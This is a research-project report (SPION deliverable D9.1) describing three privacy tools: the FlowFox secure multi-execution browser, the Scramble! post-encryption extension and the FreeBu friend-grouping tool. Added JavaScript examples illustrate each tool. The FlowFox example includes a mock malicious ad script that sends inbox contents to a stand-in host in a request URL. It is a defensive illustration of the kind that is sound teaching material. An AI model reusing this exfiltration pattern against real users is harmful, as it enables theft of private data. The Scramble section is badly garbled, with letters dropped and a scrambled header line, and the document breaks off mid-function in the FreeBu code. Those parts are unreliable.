
Agentschap voor Innovatie door Wetenschap en Technologie IWT

SBO Security and Privacy for Online Social Networks

Document type Report

Title D9.1 – First iteration of software prototypes and report describing those prototypes

Deliverable Number D9.1

Editor(s) E. Vanderhoven, T. Schellens, M. Valcke, OWK, Ghent University

Dissemination level External

Preparation date 21 December 2012

Version 1.0

Legal Notice All information included in this document is subject to change without notice. The Members of the IWT SBO SPION project make no warranty of any kind with regard to this document, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. The Members of the IWT SBO SPION project shall not be held liable for errors contained herein or direct, indirect, special, incidental or consequential damages in connection with the furnishing, performance, or use of this material.


The IWT SBO SPION Project

Nr.  Participant name            Country  Department  Participant role
1    KU Leuven                   BE       COSIC/ESAT  Coordinator
2    KU Leuven                   BE       DISTRINET   Partner
3    KU Leuven                   BE       DTAI        Partner
4    KU Leuven                   BE       ICRI        Partner
5    Vrije Universiteit Brussel  BE       SMIT        Partner
6    University of Ghent         BE       OWK         Partner
7    Carnegie Mellon University  USA      Heinz       Partner

Contributors

Nr.  Name              Organisation
1    Ellen Vanderhoven Ughent, OWK
2    Tammy Schellens   Ughent, OWK
3    Martin Valcke     Ughent, OWK
4    Willem De Groef   KU Leuven, iMinds-DistriNet
5    Dave Clarke       KU Leuven, iMinds-DistriNet
6    Frank Piessens    KU Leuven, iMinds-DistriNet
7    Rula Sayaf        KU Leuven, iMinds-DistriNet
8    Bo Gao            KU Leuven, DTAI
9    Bettina Berendt   KU Leuven, DTAI
10   Ero Balsa         KU Leuven, COSIC
11   Claudia Diaz      KU Leuven, COSIC
12   Seda Gürses       KU Leuven, COSIC
13   Bart Preneel      KU Leuven, COSIC


Content Table

Abstract
1 General Introduction
2 FlowFox: a web browser to enforce information flow policies on web scripts
3 Scramble! A software tool for enforcing confidentiality and integrity on social networking sites
4 Freebu: a software tool for obtaining feedback from the system for privacy awareness
5 Overall conclusion
References


Abstract

This report describes three software prototypes that were developed by the technical partners of the SPION-project, in close collaboration with the user group. Each tool resolves specific privacy- and security problems that occur when using social network sites (SNS). The first tool was developed by iMinds-DistriNet and is a web browser nicknamed FlowFox that prevents online web scripts from leaking sensitive or confidential information, according to a given user-defined policy. The second tool, i.e. Scramble, was developed by COSIC and focuses on keeping the content users share in SNS confidential, regardless of which privacy settings are available to the user in the SNS, by providing the users a means to encrypt the content (e.g., messages, posts, comments) uploaded to the SNS. Finally, the third tool FreeBu was developed by DTAI. It aims to help users in recognizing the grouping structure of their online contacts, as well as in modifying these groups. Hereby, the tools try to offer a solution for the problem of context collision on SNS.


1 General introduction

The SPION-project aims to develop concrete valorization outcomes that are developed and disseminated in close cooperation with the members of the user groups. Based on our discussions with the user group, we have identified the need for better tools for security and privacy protection. Current social networking technologies lack usable mechanisms to ensure security and privacy protection. Therefore, the project aims to provide social network site-providers and developers with software tools to support the privacy-friendly privacy policies and privacy-friendly default settings that will be described in the project-deliverable 9.3. The open-source software tools developed by the technological partners of the project will address some of the existing privacy- and security concerns.

More specifically, three tools have been developed. The first tool is FlowFox [1], the first fully functional web browser that implements a precise and general information flow control mechanism for web scripts, developed by iMinds-DistriNet. It is based on the technique of secure multi-execution, which supports powerful yet precise policies refining the same-origin-policy in a way that is compatible with both online social network sites (SNS) and regular web sites. FlowFox is also a fundamental building block of the privacy-enhanced social application platform PESAP [4].

A second tool is a software plug-in to enable users to encrypt information and obtain confidentiality properties, developed by COSIC. This tool aims to keep the content users share in SNS confidential, regardless of which privacy settings the service provider puts at the users' disposal in the SNS. Several SNS allow users to decide whether they want to share some information either with their friends, family, coworkers or any other list of contacts. Other SNS have a much more limited set of privacy settings, so that the users must decide whether they want the information to be completely public or private but still accessible to all their contacts. Furthermore, users must trust the SNS providers themselves and allow them to have access to their data. "Scramble!", the tool proposed, provides users with a means to enforce their own privacy settings regardless of which SNS they are using and the privacy settings currently available in the SNS. The tool encrypts the content (e.g., messages, posts, comments) uploaded by the users to the SNS for a certain set of people previously selected by the users, so that nobody else (even the service provider) is able to decrypt the uploaded content and therefore be able to access it. As a result, Scramble enforces confidentiality and integrity for each piece of data uploaded to the SNS. Moreover, the tool performs encryption and decryption as well as integrity checks automatically, meaning that users never have to deal with complex cryptographic techniques themselves.

The third tool is called FreeBu and is developed by DTAI. It is a tool for obtaining feedback from the system to raise privacy awareness. Indeed, in SNS it can be difficult to maintain the context of a conversation or action, i.e. to know what the situation is and how to act appropriately. The resulting uncertainties may lead to privacy issues. In developing the tool, there was a focus on one issue, i.e. context collision. We propose that a first step to address this issue is to help users distinguish groups of contacts within their SNS-accounts. Therefore, a small user study was conducted to investigate the criteria users apply when grouping the people they know. We summarized our participants' strategies of labeling the groups and found that they based the grouping mainly on their connections with others. We used these results in the design of FreeBu, a semi-automatic and interactive grouping tool, which is based on mining friend graph data for community detection and profile information for labeling.

In what follows, all tools are described more extensively. It is mentioned how different partners of the project cooperated to create tools that are adapted to the target users. A detailed description of the tool, together with a step-by-step guide, is given for every tool. Finally, it is concluded how these tools contribute to the existing set of software tools.

2 FlowFox: a web browser to enforce information flow policies on web scripts

2.1 Introduction

An important contributor to the success of social networks is their support for third-party applications. Such applications provide social-enhanced features or functionality (e.g. quizzes) or social games. With such applications, the code provider is typically a third stakeholder, next to the social network provider and the end users. Since these applications are social-aware, they need access to private information of the user to reach their full potential. As a consequence, there is a strong need for security and privacy controls, and enforcing such controls is complex because of the many stakeholders involved.

In the context of web-based online social networks (the majority of current social networks are web-based), third-party applications are typically developed in scripting languages like JavaScript, and access control or information flow control is addressed at the level of the scripting language.
These third-party applications, like all web scripts, are typically a combination of markup and executable scripts where the scripts can interact with their environment through a collection of powerful APIs that offer communication to remote servers, communication with other pages displayed in the browser, and access to user, browser and application information including information such as the geographical location, clipboard content, browser version and application page structure and content. With the advent of the HTML5 standards, the collection of APIs available to scripts has substantially expanded.

An important consequence is that scripts can be used to attack the confidentiality or integrity of that information. Scripts can leak session identifiers, inject requests into an ongoing session, sniff the user's browsing history, or track the user's behavior on a web site. Such malicious scripts can enter a web page because of a cross-site scripting vulnerability, or because the page integrates third party scripts such as advertisements, or gadgets. A recent study has shown that almost all popular web sites include such remotely-hosted scripts [3]. The importance of these attacks has led to many countermeasures being implemented in browsers. The first line of defense is the same-origin-policy (SOP) that imposes restrictions on the way in which scripts and data from different origins can interact. However, the SOP is known to have holes [5], and all of the attacks cited above bypass the SOP. Hence, additional countermeasures have been implemented or proposed. Some of these are ad-hoc security checks added to the browser (e.g. to defend against history-sniffing attacks, browsers responded with prohibiting access to the computed style of HTML elements [8]), others are elaborate and well thought-out research proposals to address specific subclasses of such attacks (e.g. AdJail [6] proposes an architecture to contain advertisement scripts).

Several researchers have proposed information flow control as a general and powerful security enforcement mechanism that can address many of these attacks, and hence reduce the need for ad-hoc or purpose-specific countermeasures. Several prototypes that implement some limited form of information flow control have been developed. However, general, flexible, sound and precise information flow control is difficult to achieve, and so far nobody has been able to demonstrate a fully functional browser that enforces sound and precise information flow control for web scripts. The tool developed by iMinds-DistriNet, i.e. FlowFox, is the first available web browser that can enforce general information flow security, based on confidentiality policies on the interactions between web scripts and the browser.

This tool has been developed in close collaboration with the other partners of the SPION-project and the users. First, the frequent SPION meetings were the ideal place for discussions amongst the different partners. The outcome of these meetings has highly influenced our research.
Also the SPION technical workshop and the numerous discussions with the participants of the workshop contributed to the overall quality of our work. Second, we've had intense contact with Netlog, one of our user group partners, to discuss several privacy issues concerning social application platforms. Those discussions have influenced our research in general and more particularly our work on privacy-enhanced application platforms [4].

2.2 Description of the tool

FlowFox is a fully functional web browser enhanced with an information flow technology named secure multi-execution [2]. FlowFox is implemented on top of Mozilla Firefox 8.0.1. In practice, FlowFox prevents web scripts from leaking sensitive or confidential information, according to a given user-defined policy. FlowFox can also be applied in the context of an innovative privacy-enhanced social application platform (PESAP) by preventing de-anonymized information from leaving the browser towards social application platforms.

The installation procedure of FlowFox is the same as for an original Mozilla Firefox. Depending on the used operating system, the procedure, however, can vary.¹ The project home page (https://distrinet.cs.kuleuven.be/software/FlowFox/) contains detailed instructions on how to download & install FlowFox. The main installation idea on all operating systems is to (1) download the installation package, (2) install the package on your local machine and (3) run FlowFox.

To download the installation package, visit the FlowFox download page in any browser. On the download page, you will find a link to the latest FlowFox version. Depending on your connection speed, the download may take up to a few minutes. After downloading, you have to unpack the installation package, according to the explanation on the download page. After the first step, the user ends up with a directory containing all necessary files. The user can decide to install FlowFox system-wide, however this is not required.

At start-up, the user needs to specify a policy file. This policy file contains the policies that will be enforced by FlowFox during the current session. The installation package comes with a pre-configured policy file. While surfing the web, the user-defined policies are hidden from the user and are meant for expert users only. How to modify a confidentiality policy for FlowFox is described in detail on the project web site.

Once the user starts surfing on the web, each piece of JavaScript will be executed under the secure multi-execution regime, in correspondence with the given policy. If such a web script doesn't leak sensitive information, the observable program semantics will not change. However, when a web script tries to leak sensitive information, FlowFox will fix the leak while trying to preserve the original functionality of the script as much as possible.

The following example shows how this process works. Imagine the scenario of a malicious advertisement script, embedded in an online e-mail application. The original behavior of this script would be twofold: to leak the content of the user's inbox and to show a banner image.
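
The malicious-advertisement scenario can be replayed outside a browser. The JavaScript model below is an added example, not FlowFox code: it applies the secure multi-execution rules (one run of the script per security level, default values for inputs above the run's level, each output performed only by the run at its own level) to a constructed ad script. The API names readInbox, httpGet and showImage, the two-level policy and the ads.example URL are assumptions made for the illustration.

```javascript
// Added model of secure multi-execution (SME); not FlowFox source code.
// Security levels, lowest first. Two levels are assumed for this sketch.
const LEVELS = ['low', 'high'];

// Hypothetical policy: every API call the script can make gets a level,
// and calls that return data get a default value for runs below that level.
const POLICY = {
  readInbox: { level: 'high', defaultValue: '' }, // confidential input
  httpGet: { level: 'low' },                      // visible to remote servers
  showImage: { level: 'high' },                   // visible only to the user
};

// Constructed stand-in for the browser: records what leaves the machine
// (network) and what the user gets to see (screen).
function makeBrowser(inbox) {
  const network = [];
  const screen = [];
  const impl = {
    readInbox: () => inbox,
    httpGet: (url) => {
      network.push(url);
      return 'image-for-request-' + network.length;
    },
    showImage: (image) => { screen.push(image); },
  };
  return { network, screen, impl };
}

// The malicious advertisement from the text: leak the inbox, show a banner.
function adScript(api) {
  const mail = api.readInbox();
  const banner = api.httpGet(
    'https://ads.example/banner?d=' + encodeURIComponent(mail));
  api.showImage(banner);
}

// Ordinary browser behaviour: one run with direct access to every API.
function runUnprotected(script, browser) {
  script(browser.impl);
  return browser;
}

// SME: run the script once per level, lowest level first.
function runSecureMultiExecution(script, browser, policy) {
  const recorded = new Map(); // results of real calls, keyed "api#callIndex"
  LEVELS.forEach((runLevel, runRank) => {
    const callCount = {};
    const api = {};
    for (const [name, rule] of Object.entries(policy)) {
      api[name] = (...args) => {
        const index = callCount[name] = (callCount[name] ?? -1) + 1;
        const key = name + '#' + index;
        const apiRank = LEVELS.indexOf(rule.level);
        // Call is more sensitive than this run: skip it, hand back the default.
        if (runRank < apiRank) return rule.defaultValue;
        // Call was already performed by a lower run: reuse its result
        // (undefined if the lower run made fewer calls).
        if (runRank > apiRank) return recorded.get(key);
        // Same level: perform the call for real and remember the result.
        const result = browser.impl[name](...args);
        recorded.set(key, result);
        return result;
      };
    }
    script(api);
  });
  return browser;
}

// Replays the scenario with a constructed inbox and returns both traces.
function replayScenario(inbox) {
  const plain = runUnprotected(adScript, makeBrowser(inbox));
  const sme = runSecureMultiExecution(adScript, makeBrowser(inbox), POLICY);
  return { plain, sme };
}
```

In the unprotected run the request URL carries the inbox text; under the model's SME rules the single request that reaches the network is built from the default value, and the banner returned for it is still displayed.
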
However, if this scenario would be executed within FlowFox, the user would still see some banner image – because the functionality is preserved as much as possible –, but the leak will be closed.

2.3 Conclusion

Several researchers have proposed information flow control as a general and powerful security enforcement mechanism that can address many web script attacks, and hence reduce the need for ad-hoc or purpose-specific countermeasures. Several prototypes that implement some limited form of information flow control have been developed. However, general, flexible, sound and precise information flow control for online web applications is difficult to achieve, and so far nobody has been able to demonstrate a fully functional browser that enforces sound and precise information flow control for web scripts. As a consequence, there was no evidence for the practicality of this approach in the context of web applications in general and social web applications in particular, up until now. We developed FlowFox, the first fully functional web browser that implements a precise and general information flow control mechanism based on the technique of secure multi-execution. In practice, FlowFox prevents any web scripts from leaking sensitive or confidential information, according to a given user-defined policy.

In our main research paper [1], we have discussed the design, implementation and evaluation of FlowFox, a browser that extends Mozilla Firefox with a general, flexible and sound information flow control mechanism. FlowFox provides evidence that information flow control can be implemented in a full-scale web browser, and that doing so supports powerful security policies without compromising compatibility. In our second paper [4], we presented a framework that includes FlowFox, for a privacy enhanced social application platform (PESAP), that technically enforces the protection of the personal information of a user when interacting with social applications.

¹ We currently only provide a build of FlowFox that requires Ubuntu Linux (32bit).

3 Scramble! A software tool for enforcing confidentiality and integrity on social networking sites

3.1 Introduction

Current social networking sites (SNS) provide a range of privacy settings for users to configure and decide who can access the content they upload to the site. Several issues arise from this situation. To begin with, the privacy settings are unilaterally designed and enforced by the service provider. This means that the user has a limited set of choices regarding who is able or unable to access the content he/she uploads to the site. For example, the service provider may provide the user with few choices: either all data will be public to all users on the Internet, or visible just to his/her full list of friends, or just to him/herself. Hence, this limited set of choices may be in conflict with the user's desire to share certain items of information with just a subset of his/her friends, with this set being different for certain items of information and dynamic in time.
The lack of flexible and easily tunable privacy settings may cause users to perceive their privacy as being violated and even force them to refrain from uploading content to the SNS.

Because the privacy settings are unilaterally enforced by the service provider, the provider may as well decide to change them at any given time, even without giving notice. Changes in privacy settings directly affect the visibility of the content users upload to SNS, making it available to a wider or narrower audience than the user initially intended. Both the widening and narrowing of the availability of users' content may seriously affect the users' privacy. On the one hand, making the users' data available to a wider audience potentially discloses sensitive information to parties the users rely on it not being disclosed to, e.g., a user organizing a surprise party for a friend relies on information about this party not being available to this friend. On the other hand, making the users' data available to a narrower audience potentially prevents people the user expected to reach from accessing that information, e.g., information about the surprise party is not available to all the invited guests anymore.

Lastly, regardless of how coarse or fine grained the privacy settings designed by the service provider are, the provider is able to access all the users' data. This means that all the activities performed on and the contents uploaded to the online social network are being monitored and processed by a single, all-powerful entity. Users unwilling to disclose their information to the service provider have no choice but to refrain from using the service. All other users may face several privacy threats resulting from the collection of highly sensitive data by the service provider: from insider attacks by the provider employees to the pressure of the police or any other law enforcement authorities, from the data mining performed by marketeers and the pressure of companies to gather accurate information about consumers' choices and behaviours, the service provider may leak intentionally or unintentionally very sensitive and personal information from the users.

Scramble!, the tool we present in this document, aims at solving all three aforementioned problems by means of encryption. This provides an alternative for the user to decide who is able to access the data he/she uploads on the SNS, so that no unauthorised user, including the service provider, is able to access his/her data, regardless of the site's privacy settings and further changes to these settings. Previous works such as Lockr [16, 15], NOYB [17] or FaceCloak [18] have provided a similar solution to these problems, namely, a solution based on cryptographic techniques implemented either as a browser plug-in or a Facebook application. The main difference between these solutions and Scramble! is that whereas the former are platform specific, Scramble! is SNS-independent, i.e., it can be used in any site.

Scramble! has been developed in close collaboration with the other partners of the SPION-project.
This collaboration is varied and happens at different frequency, intensity and levels. First of all, our frequent SPION meetings are the perfect opportunity to discuss the details and intricacies of our research and the development of the valorization tool. In these meetings we obtain valuable feedback for better designing and improving our tool. Moreover, through the joint examination of the conceptual framework inherent to the SPION project we have come across several issues that are important for the successful development of our tool.

Indeed, iMinds-SMIT has aroused our research interest in several privacy issues, such as context collision [10], context collapse [7], invisible audiences [14] and the blur between public and private [7], to which our tool has managed to provide a solution. Moreover, iMinds-SMIT has mentioned serious privacy problems stemming from users being unaware of what is happening with their data online. Because our tool uses robust encryption techniques, any leaked data are encrypted, thus no unauthorised party can access their content. Finally, iMinds-SMIT has highlighted the importance of developing tools that, while tackling the raised privacy issues, do not imperil the positive features represented by SNS.

Interaction with OWK helps us develop a more pedagogical language for communicating with users and understanding their needs. This is important in order to be able to include their requirements in the development process, as targeting the privacy problems users perceive is the essence of this tool. Furthermore, interaction with iMinds-DistriNet and DTAI (the two other technical partners in SPION) has provided us valuable feedback regarding how to address other privacy problems from a technical perspective, as well as highlighting the core problems to users' privacy in online social networks.

Finally, we are starting to closely collaborate with CMU. We have started conversations about the evaluation of the tool from the economics of privacy and behavioural economics points of view. Guided by the expertise of CMU in those fields, we are planning to execute a thorough evaluation. The result of such evaluation should shed light on several questions related to understanding the behaviour of the users of the tool. Understanding how the privacy perception of users changes when using the tool, whether or not their behaviour changes as they are given more control over the disclosure of their data and to what extent the tool meets their expectations of privacy protection are amongst several questions that we want to answer with this evaluation. The results of this evaluation will be reported in SPION-deliverable 9.3 (Report containing "usability and behavioral evaluations of the software tools").

3.2 Description of the tool

"Scramble!" is a client side application implemented as a browser plug-in (a Firefox extension) that users can install on their computers to keep their SNS data confidential. Scramble! generates cryptographic keys² and automatically encrypts the content users post in SNS so that only the friends they choose to share it with are able to decrypt it. Note that this requires other users to install Scramble as well, i.e., a user must install Scramble to be able to decrypt the messages sent or posted by their friends.
For example, if Alice uses Scramble! to send encrypted messages to her friends Bob and Charlie, they need to install Scramble to be able to read Alice's messages.³

Scramble therefore guarantees the confidentiality of the users' data towards any user or entity, such as the service provider, that the users do not grant access to. Scramble contains an easy-to-use user interface for defining the set of users the data should be shared with.

"Scramble!" provides a solution to users of social networking sites that either want to conceal the content of the data they upload to the service provider, or are unsatisfied with the privacy settings enforced by the social network provider, or both.

After the users install "Scramble!" on Firefox, a small Rubik's cube icon will appear at the right bottom of the browser window. This indicates that Scramble was successfully installed. Right after installation, users can either ask Scramble! to generate cryptographic keys for them or use their own cryptographic keys. After generating the keys, Scramble! automatically uploads the public keys to a server on the Internet so that the users' friends are able to retrieve them, while keeping the private key securely on each user's computer. In fact, to obtain the keys of their friends, users can either provide to Scramble! their friends' e-mail addresses or also provide them directly to Scramble! from a text file, for example.

After the key generation process Scramble! is ready to use. In order to do that, users just write messages in the fields provided in the SNS, as they would normally. The only difference while using Scramble is that, before posting/sending the message, the user selects the message⁴ of which he/she wants to restrict availability to a certain subset of his/her contacts. Then, the user right-clicks on the selected message to obtain the dialogue that leads to the Scramble tool. Figure 1 shows this process. The user selects Scramble → Scramble It! and is directed to a new window where he/she can select the people he/she wants to be able to decrypt the message.

² The public key pairs can also be provided by the user.

³ Strictly speaking, this is not necessarily true. Bob and Charlie could manually generate their own public key pairs, share them with Alice and then decrypt the messages themselves. However, this would require Bob and Charlie being able to deal with cryptographic mechanisms. What Scramble! precisely does is to manage complex cryptographic operations in the background.

Figure 1: Sele ting a message to be en rypted with S ramble!Alternatively, instead of right- li king the message, the user may li k onthe small rubik's ube at the right bottom of the browser window, where thesame option �S ramble It!� is available. This is shown in Figure 2.On e the option �S ramble It!� is sele ted, a new di�erent S ramble! windowis shown by the browser, as shown in Figure 3. In this window, the user is able4or part of the message12

Page 13: Agentschap voor Innovatie door Wetenschap en Technologie ...PESAP [4]. A second to ol is a are w soft plug-in to enable users encrypt information and obtain y tialit con den prop erties,

Figure 2: Using the small rubik's ube i on in the browser to a ess S ramble!to sele t the onta ts he/she wants to share the message with. He/she an eithersele t full groups or hoose person by person, whatever the needs are. On e theuser sele ts the people wanted to a ess the message, one li ks done, and thewindow will be losed bringing the user ba k to the SNS.S ramble had en rypted by now the message with the spe ial S ramble head-ers, as shown in Figure 4. The message is now ready to be posted.On e the message has been posted, S ramble will de rypt the message au-tomati ally for the user, as well as for the onta ts hosen by the user to beable to de rypt and read the message. Therefore, no user has to deal with the ompli ated ryptographi te hniques used by S ramble. It is easy to use andtransparent to the user.S ramble an be downloaded here: http://sour eforge.net/proje ts/s ramble-it/files/latest/downloadInstru tions on how to install S ramble an be found here: http://homes.esat.kuleuven.be/fbeato/extras/s ramble/install.htmlInstru tions on how to use S ramble an be found here: http://homes.esat.kuleuven.be/fbeato/extras/s ramble/howto.html3.3 Con lusionWe have implemented S ramble, a Firefox extension that provides users witha way of enfor ing on�dentiality and integrity to the ontent they upload onso ial network sites. S ramble is SNS independent thus an be used in various13


SNS, such as Twitter, Facebook, Google+ or MySpace. Furthermore, not only is it SNS independent, but it can also be used with other Web 2.0 services, such as blogs, forums and wikis. Potentially, it allows users to store data in encrypted format in any cloud service.

Figure 3: Scramble selection dialogue, where the user can select the audience allowed to access the message posted

Figure 4: The message encrypted by Scramble, ready to be posted in the SNS

The extension allows the definition of groups to ease the task of selecting which users should be granted access to the user content, as well as the encryption of content under the keys of all group members. Using a public key encryption scheme we are able to protect the integrity and confidentiality of user created data, especially towards the service provider. Scramble is easy to use and transparent for the users, as it automatically decrypts the content for the authorised users.
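The group encryption and transparent decryption described above, as an added JavaScript sketch; it is not Scramble's own code or message format, which this report does not show. It assumes Node.js's built-in crypto module, RSA-OAEP key wrapping and AES-256-GCM; the markers, field names and users are hypothetical.

```javascript
// Added example (not Scramble's code or wire format): one post, many readers.
const nodeCrypto = require('node:crypto');

// Hypothetical text markers so a client can spot protected posts in a page.
const HEADER = '-----BEGIN PROTECTED POST-----';
const FOOTER = '-----END PROTECTED POST-----';
const OAEP = { padding: nodeCrypto.constants.RSA_PKCS1_OAEP_PADDING, oaepHash: 'sha256' };

// Constructed contact with a fresh RSA key pair (stands in for a real key ring).
function makeUser(name) {
  const { publicKey, privateKey } =
    nodeCrypto.generateKeyPairSync('rsa', { modulusLength: 2048 });
  return { name, publicKey, privateKey };
}

// Encrypt the text once under a random AES-256-GCM key, then wrap that key
// under the public key of every group member.
function encryptForGroup(plaintext, members) {
  const key = nodeCrypto.randomBytes(32);
  const iv = nodeCrypto.randomBytes(12);
  const cipher = nodeCrypto.createCipheriv('aes-256-gcm', key, iv);
  const body = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
  const envelope = {
    iv: iv.toString('base64'),
    tag: cipher.getAuthTag().toString('base64'),
    body: body.toString('base64'),
    keys: members.map((m) => ({
      to: m.name,
      wrapped: nodeCrypto.publicEncrypt({ key: m.publicKey, ...OAEP }, key).toString('base64'),
    })),
  };
  return HEADER + Buffer.from(JSON.stringify(envelope)).toString('base64') + FOOTER;
}

// Returns the plaintext for an authorised reader, the post itself if it is not
// protected, and null if the reader has no key slot or the post was modified.
function readPost(post, user) {
  if (!post.startsWith(HEADER) || !post.endsWith(FOOTER)) return post;
  try {
    const raw = post.slice(HEADER.length, post.length - FOOTER.length);
    const env = JSON.parse(Buffer.from(raw, 'base64').toString('utf8'));
    const slot = env.keys.find((k) => k.to === user.name);
    if (!slot) return null;
    const key = nodeCrypto.privateDecrypt(
      { key: user.privateKey, ...OAEP }, Buffer.from(slot.wrapped, 'base64'));
    const d = nodeCrypto.createDecipheriv('aes-256-gcm', key, Buffer.from(env.iv, 'base64'));
    d.setAuthTag(Buffer.from(env.tag, 'base64'));
    return Buffer.concat([d.update(Buffer.from(env.body, 'base64')), d.final()]).toString('utf8');
  } catch {
    return null; // wrong key, damaged envelope, or failed GCM tag check
  }
}

// Simulate a stored post whose ciphertext was altered by one bit.
function tamper(post) {
  const raw = post.slice(HEADER.length, post.length - FOOTER.length);
  const env = JSON.parse(Buffer.from(raw, 'base64').toString('utf8'));
  const body = Buffer.from(env.body, 'base64');
  body[0] ^= 1;
  env.body = body.toString('base64');
  return HEADER + Buffer.from(JSON.stringify(env)).toString('base64') + FOOTER;
}

function demo() {
  const [alice, bob, carol] = ['alice', 'bob', 'carol'].map(makeUser);
  const post = encryptForGroup('My new number is 0000 00 00 00', [alice, bob]);
  return {
    bob: readPost(post, bob),               // group member: plaintext
    carol: readPost(post, carol),           // not in the group: null
    modified: readPost(tamper(post), bob),  // integrity check fails: null
    plainPost: readPost('hello', carol),    // ordinary post passes through
  };
}
```

In this sketch the recipient names travel in the clear inside the envelope, so the service provider still learns the audience of a post even though it cannot read the content or alter it undetected.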


In addition to the confidentiality and integrity properties previously mentioned, which tackle problems such as unsuitable, cumbersome or changing privacy settings, as well as the pervasive monitoring of the service provider, there is a substantial amount of added value that users can obtain through the use of Scramble. Because Scramble prevents the service provider from accessing the information posted by the users in the SNS, it prevents inferences made by marketeers based on user data that could lead to negative price discrimination or intrusive targeted advertisement.

Moreover, Scramble is publicly available and free. Finally, Scramble is open source, meaning that the technology experienced community can tune it and keep improving it to adapt to current non-addressed or future demands of the users.

4 FreeBu: a software tool for obtaining feedback from the system for privacy awareness

4.1 Introduction

One privacy issue that has been widely discussed with regard to SNS is Context Collision or Context Collapse [7, 9, 10]. It refers to the situation in which, due to technology barriers and the large amount of information in SNS, a user fails to recognize the boundaries between different contexts, and thus behaves inappropriately towards others in an online social environment. For instance, a user might post something that is visible to undesired audiences or that is considered undesirable by some audiences. We recognize that a first step to address this issue is to help a user distinguish different groups of people that he/she knows online, so that the information flow towards supposedly different people can be better managed by the user.

Therefore, we developed a tool, i.e. FreeBu, that aims to help users resolve context collision by aiding them in recognizing the grouping structure of their online contacts, as well as in modifying these groups. In the development process, first, we conducted a small user study to investigate what criteria users employ to group their friends and other people they know. This provided us with a basis to generate descriptions (labels) of detected communities in the tool. Second, based on the findings from the user study, we motivated our choice for an approach based on data mining. More specifically, we used a graph-based community detection algorithm to extract groups of the user's contacts. Third, we described a method and an interactive tool for community detection and labeling.

FreeBu provides the user with a semi-automatic grouping solution. It first presents the user with a fully-automated grouping suggestion. As mentioned before, this suggestion is constructed based on our user study to mimic users' grouping behavior in general, so that the groups look natural or sensible to the user. This saves the user a significant amount of time, because he/she does not need to categorize all the friends into groups manually. Next, if the user feels like


modifying the grouping structure, he/she can drag and drop people to different groups, create new (sub)groups, or remove certain (sub)groups. Once satisfied with the grouping structure, users can directly publish the groups as friend lists on their Facebook account. This means that a group in FreeBu corresponds to a friend list in the user's Facebook account. With such an approach, the user can create friend lists effectively and efficiently.

In our process of developing this software tool, we collaborated closely with the other partners of the SPION project. We had many meetings with iMinds-DistriNet, discussing ideas of underlying access control models and top-level interfaces for assisting SNS users in general to protect their privacy. These discussions focused on the needed requirements, the definition of contexts and how these contexts can be used, which became an inspiration for the later tool development.

iMinds-SMIT's argument in deliverable 2.1 State Of The Art (SOTA) on the lack of situation or context in SNS is very relevant to our research. It pointed out the literature about context collision or context collapse, which served as our direct motivation for building our grouping tool for context management in SNS. iMinds-SMIT's focus on the relationship between offline and online communities, especially the part on the close connections between online and offline environment, led us to take into account online as well as offline contacts in the questions we asked during a small user study of grouping behavior, designed to inform tool development. Discussions with iMinds-SMIT also led us to adopt the method for grouping elicitation that they use: letting users create tree structures to externalize their mental groupings. At the moment, we are collaborating with iMinds-SMIT on an evaluation study of FreeBu, which will be reported in SPION deliverable 9.3 (Report containing "Evaluation of the software tools from the perspective of the user expectations, practices, and context of use").

CMU listed several cases of information disclosure of users on Social Networking Sites and the privacy issues that stem from such disclosure. CMU then showed several possible aiding strategies that have been described in the literature to protect users' privacy, which include (1) "design approaches in group context" and (2) "soft paternalism". The former pointed out the need for the management of group contexts in SNS; the latter emphasized that, without coercion, technology can guide users to make more appropriate decisions concerning their privacy. Both have contributed to the idea and the building of our grouping tool.

OWK's comments on "raising awareness about information flow" and "learn how to build an online identity" mentioned in the "think before you post" section in the SOTA also contributed to the development of our tool. Furthermore, OWK pointed out that among the current educational packages that guide young users to protect their privacy in using the internet, especially SNS, few refer to real technical skills like changing the privacy settings. We consider our grouping tool with vivid visualizations as a possible aid for countering these possible problems. However, although it helps direct the users' attention to the privacy settings, FreeBu does NOT directly change the user's privacy


settings.

4.2 Description of the tool

The tool we developed is called FreeBu (Friend Tree Bubbles). It is a desktop application that runs on the user's Facebook friend graph and friend profile data. The friend graph and profile data are extracted by a token submitter before running the FreeBu tool. The tool targets any Facebook user.

We propose an automatically generated grouping based on the user's friend graph on Facebook. This way, we aim to make the users reflect about the grouping of their friends and to increase their awareness of existing friend groups. For the visualization of the result, we adopt the star-tree form to represent the grouping structure. As shown in Figure 5, the nodes of the tree are represented by circles and each pair of parent-child nodes is connected by a straight line. The root of the tree (the blue circle in the middle) represents the user, the red circles represent different communities detected by the algorithm, and the leaves (the green circles surrounding the red ones) represent the user's friends on Facebook. We scale the sizes of community circles based on the number of people within each community; a larger size corresponds to more people.

The labels, which include the number of people and the common characteristics of these people, are shown on top of the community circles. As an example, if a community contains one person, only the number "1" is shown as a label to indicate the number of people within this community. The user can click on one bubble (a community or a person) to zoom in and concentrate on a particular part of the tree. In this paper, we blurred the labels for privacy reasons. The labels are typically school names, school years and work places. The number in front of the blurred labels indicates the number of people in the corresponding circles. The user can adjust the number of labels shown by sliding the threshold bar.

Initially, we provide the user with one-layer grouping. The user can modify it by adding or removing (sub)groups, as shown in Figure 6.
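The grouping and labelling step described above, as an added JavaScript example; it is not FreeBu's code. The report does not name its community detection algorithm, so this sketch substitutes a simple one (drop friendships whose endpoints share few neighbours, then take connected components), and it assumes that the label threshold is the minimum share of members holding an attribute. All names and data are constructed.

```javascript
// Added example: a simple stand-in for the community detection and labelling step.
// Constructed sample: friendships among the user's friends (the user is left out).
const EDGES = [
  ['ann', 'ben'], ['ann', 'cat'], ['ann', 'dan'], ['ben', 'cat'], ['ben', 'dan'],
  ['cat', 'dan'], ['dan', 'eve'], ['eve', 'fay'], ['eve', 'gus'], ['fay', 'gus'],
];
// Constructed profile attributes (school names, school years, work places).
const PROFILES = {
  ann: ['School A', 'Class of 2010'], ben: ['School A', 'Class of 2010'],
  cat: ['School A', 'Class of 2011'], dan: ['School A', 'Company B'],
  eve: ['Company B'], fay: ['Company B'], gus: ['Company B', 'School C'],
  hal: ['School C'],
};

// Jaccard similarity of the closed neighbourhoods (node plus its friends) of a and b.
function similarity(adj, a, b) {
  const na = adj.get(a), nb = adj.get(b);
  let shared = 0;
  for (const x of na) if (nb.has(x)) shared++;
  return shared / (na.size + nb.size - shared);
}

// Keep only edges between friends with similar neighbourhoods, then return the
// connected components, largest first. Friends without strong ties stay alone.
function detectCommunities(profiles, edges, minSimilarity = 0.5) {
  const people = Object.keys(profiles).sort();
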